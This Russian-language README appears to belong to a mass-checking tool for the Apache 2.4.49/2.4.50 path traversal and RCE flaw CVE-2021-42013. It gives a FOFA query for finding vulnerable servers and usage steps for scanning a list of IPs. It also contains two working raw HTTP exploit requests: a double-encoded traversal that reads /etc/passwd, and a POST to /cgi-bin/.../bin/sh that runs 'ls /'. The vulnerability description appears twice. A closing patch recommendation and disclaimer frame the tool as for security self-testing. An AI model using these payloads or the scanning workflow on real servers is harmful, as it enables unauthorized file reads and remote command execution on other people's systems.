
Apache массовый инструмент обнаружения удаленного выполнения кода (CVE-2021-42013): Apache HTTP Server — это веб-сервер с открытым исходным кодом, разрабатываемый Apache Software Foundation. Он отличается быстротой, надежностью и расширяемостью через простой API. Было обнаружено, что исправление CVE-2021-41773 в Apache HTTP Server 2.4.50 недостаточно. Злоумышленник может использовать атаку с обходом пути, чтобы отобразить URL на файлы, расположенные вне каталогов, настроенных директивами, такими как Alias. Если эти файлы за пределами каталогов не защищены обычной конфигурацией по умолчанию «Require all denied», такие запросы могут быть успешными. Если для этих путей также включены CGI-скрипты, это может позволить удаленное выполнение кода. Эта проблема затрагивает только Apache 2.4.49 и Apache 2.4.50, но не более ранние версии.
Удаленное выполнение кода в Apache (CVE-2021-42013)
Apache HTTP Server — это веб-сервер с открытым исходным кодом от Apache Software Foundation. Он отличается быстродействием, надежностью и возможностью расширения через простые API. Обнаружено, что исправление для CVE-2021-41773 в Apache HTTP Server 2.4.50 было недостаточным. Злоумышленник может использовать обход пути для отображения URL на файлы вне каталогов, настроенных с помощью директив, подобных псевдонимам. Если файлы за пределами этих каталогов не защищены обычной конфигурацией по умолчанию «Require all denied», такие запросы могут быть успешными. Если для этих путей с псевдонимами также включены CGI-скрипты, это может позволить удаленное выполнение кода. Эта проблема затрагивает только Apache 2.4.49 и Apache 2.4.50, но не более ранние версии.
Apache HTTP Server 2.4.49
Apache HTTP Server 2.4.50
server="Apache/2.4.49" || server="Apache/2.4.50"
1. Поместите IP-адреса для проверки в файл ip.txt
2. Запустите python3 check.py
GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1
Host: vuglfocus.fofa.so:55493
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ZMSESSID=fcnisfo6rj1snid6e5r27kj1n0; zmSkin=classic
Connection: close
GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1
Host: vuglfocus.fofa.so:55493
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ZMSESSID=fcnisfo6rj1snid6e5r27kj1n0; zmSkin=classic
Connection: close
Content-Length: 57
echo Content-Type: text/plain; echo;ls /

В настоящее время эти уязвимости уже исправлены. Учитывая серьезность уязвимости, рекомендуется немедленно обновить систему до Apache HTTP Server 2.4.51 (выпущен 7 октября) или более поздней версии.
Ссылка для загрузки:
https://httpd.apache.org/download.cgi#apache24
Этот инструмент предоставляется только для самостоятельной проверки безопасности специалистами по безопасности. Автор не несет ответственности за любые последствия, вызванные неправомерным использованием пользователями. Пользователи должны обязательно соблюдать местные законы. Данная программа не может использоваться в коммерческих целях, только для обучения и обмена.
